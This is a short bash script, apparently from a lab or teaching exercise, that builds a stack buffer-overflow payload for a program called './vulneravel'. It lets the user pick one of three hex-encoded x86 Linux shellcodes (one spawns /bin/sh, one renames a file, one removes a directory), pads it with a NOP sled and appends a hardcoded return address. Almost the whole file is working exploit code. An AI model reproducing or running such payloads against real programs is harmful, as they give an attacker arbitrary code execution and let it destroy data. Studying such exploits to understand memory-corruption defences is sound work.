#! /bin/bash

buf_addr="52ffefbf"

printf "choose shellcode: shell, rename or rmdir:\n"
read input

nop=

if [ $input == "shell" ]; then

shell="eb2a5e897608c6460700c7460c00000000b80b00000089f38d4e088d560ccd80b801000000bb00000000cd80e8d1ffffff2f62696e2f73680089ec5dc3"
elif [ $input == "rename" ]; then

shell="90909090909090909090eb1c5b59b826000000cd8031c04031dbcd80e8ebffffff6d657561727100e8efffffff6d65756e6f766f61727100e9fcffffff"
elif [ $input == "rmdir" ]; then

shell="9090909090909090909090909090909090909090909090909090909090eb11b8280000005bcd80b80100000031dbcd80e8eaffffff6d65756469720030"
fi

#		"bfeffdb8"
#rep=`expr 600 - ${#shell} - ${exploit}`
rep=45

for ((i=0; $i < $rep; i++)); do
nop=$nop"90"
done

exploit=$buf_addr

arg=$nop$shell$exploit"00"
app='./vulneravel'

printf $arg
